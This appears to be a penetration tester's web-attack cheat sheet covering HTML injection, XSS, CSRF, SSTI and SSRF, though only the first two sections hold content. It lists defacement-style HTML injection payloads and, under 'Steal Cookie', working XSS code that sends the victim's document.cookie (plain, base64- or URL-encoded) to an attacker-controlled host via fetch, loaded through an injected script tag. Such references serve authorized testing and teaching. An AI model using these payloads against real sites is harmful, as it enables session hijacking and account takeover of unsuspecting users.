XSS / HTMLi / (S/C)SRF / SSTI
01. HTML Injection
Basic Test Payloads
<h1>h4rithd was here</h1>
<b>h4rithd was here<b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>
<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>02. Cross Site Scripting (XSS)
Steal Cookie
## ------------------| Setup on my machine
#### Basic [h4rithd.js
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))
## ------------------| Payload
<script src="http://<IP>/h4rithd.js"></script>Payloads
Server Side XSS (Dynamic PDF)
Other APIs
03. Cross-Site Request Forgery (CSRF)
Create Payload
04. Server-Side Template Injection (SSTI)

Click here for list of payloads.
05. Server-Side Request Forgery (SSRF)
Gopher [Link]
Last updated